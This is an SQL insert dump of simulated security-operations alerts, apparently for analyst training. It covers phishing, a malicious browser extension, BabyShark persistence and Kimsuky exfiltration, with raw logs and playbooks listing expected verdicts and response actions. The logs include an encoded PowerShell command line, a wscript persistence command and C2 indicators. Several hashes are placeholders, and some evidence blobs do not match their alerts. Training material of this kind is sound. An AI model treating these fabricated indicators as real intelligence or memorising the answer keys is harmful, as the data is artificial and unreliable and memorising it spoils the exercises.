Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.005Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"dlp-collection-56789\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"accessed_files\\\":[\\\"/research/patient_data/sensitive_data.xlsx\\\",\\\"/research/materials_science/proprietary_formula.docx\\\"],\\\"file_hashes\\\":[\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"5eb63bbbe01eeed093cb22bb8f5acdc3\\\"],\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"alert_reason\\\":\\\"Multiple sensitive files accessed and malware hash detected.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(402, 'Data Exfiltration Attempt Blocked', 'high', 'Firewall Logs', 'A detected attempt to transfer data to an external server was blocked. This represents the final stage of a sophisticated attack, indicating a potential breach.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:47:23Z\",\"firewall_id\":\"FW-12345\",\"action\":\"blocked\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"policy_rule\":\"Block_Exfiltration_Attempts\",\"detection_method\":\"anomaly_detection\",\"alert_id\":\"alert-98765\",\"additional_info\":{\"attempted_bytes_transferred\":2048000,\"malware_family\":\"APT29\"}}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host attempting unauthorized data transfer.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file format detected in unauthorized transfer 
attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in data exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(403, 'Suspicious Email Attachment Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting key personnel at the think tank. The email contained a document with malicious macros aiming to gain initial access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"email_subject\":\"Urgent: Update Required\",\"sender_email\":\"attackers@maliciousdomain.com\",\"recipient_email\":\"john.doe@thinktank.org\",\"attachment_name\":\"UpdateInstructions.docm\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malware_family\":\"Emotet\",\"user\":\"jdoe\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attackers@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"UpdateInstructions.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"File contains macros linked to Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Emotet payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:19.007Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(404, 'Malicious Browser Extension Installed', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the attachment, a script executes silently in the background, installing a malicious browser extension designed to intercept email credentials.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"4624\",\"computer_name\":\"user-pc.example.com\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.5\",\"malicious_file\":\"browser_harvest_ext.crx\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"script_name\":\"install_extension.js\",\"process_id\":4321,\"action\":\"extension_installed\",\"extension_id\":\"abcdef123456\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareHashDB\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malicious browser extensions.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"browser_harvest_ext.crx\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalEDR\",\"verdict\":\"suspicious\",\"details\":\"Detected as part of an unauthorized installation process.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(405, 'BabyShark VBS Script Execution', 'medium', 'System Event Logs', 'The BabyShark VBS script was executed to establish persistence on the compromised system. This script runs at startup, allowing attackers to maintain access over time.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"event_id\":\"7045\",\"timestamp\":\"2023-10-12T14:22:35Z\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"action\":\"Service Installed\",\"service_name\":\"BabySharkVBS\",\"service_filename\":\"C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"command_line\":\"wscript.exe C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"associated_user\":\"compromised_user\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BabyShark VBS script.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account compromised as part of the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.009Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"7045\\\",\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Service 
Installed\\\",\\\"service_name\\\":\\\"BabySharkVBS\\\",\\\"service_filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"command_line\\\":\\\"wscript.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\BabyShark.vbs\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"associated_user\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(406, 'Unauthorized Access to Internal Network', 'high', 'Network Traffic Analysis', 'An attacker was detected moving laterally within the internal network by exploiting compromised credentials. The attacker was observed accessing multiple internal systems, suggesting an attempt to identify sensitive data and further vulnerabilities.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"user\":\"jdoe\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"file_accessed\":\"sensitive_data.xlsx\",\"hash\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"event_id\":\"4624\",\"message\":\"User jdoe successfully logged in from 203.0.113.45 to 10.0.0.5 via SMB.\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDatabase\",\"verdict\":\"internal\",\"details\":\"Compromised internal user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(407, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The Kimsuky APT group has successfully exfiltrated sensitive emails and documents related to nuclear policy. They utilized a compromised browser extension to send data back to their command and control servers.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:52:23Z\",\"event_id\":\"EXFIL-2023-1001\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"johndoe\",\"exfiltrated_files\":[\"nuclear_policy_draft.docx\",\"email_correspondence_2023.eml\"],\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_extension_id\":\"kimsuky_extension_123\",\"c2_server\":\"malicious.kimsuky.org\"}', '2026-01-04 02:18:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known Kimsuky C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Kimsuky malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nuclear_policy_draft.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Affected user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:52:23Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-1001\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"johndoe\\\",\\\"exfiltrated_files\\\":[\\\"nuclear_policy_draft.docx\\\",\\\"email_correspondence_2023.eml\\\"],\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_extension_id\\\":\\\"kimsuky_extension_123\\\",\\\"c2_server\\\":\\\"malicious.kimsuky.org\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.012Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 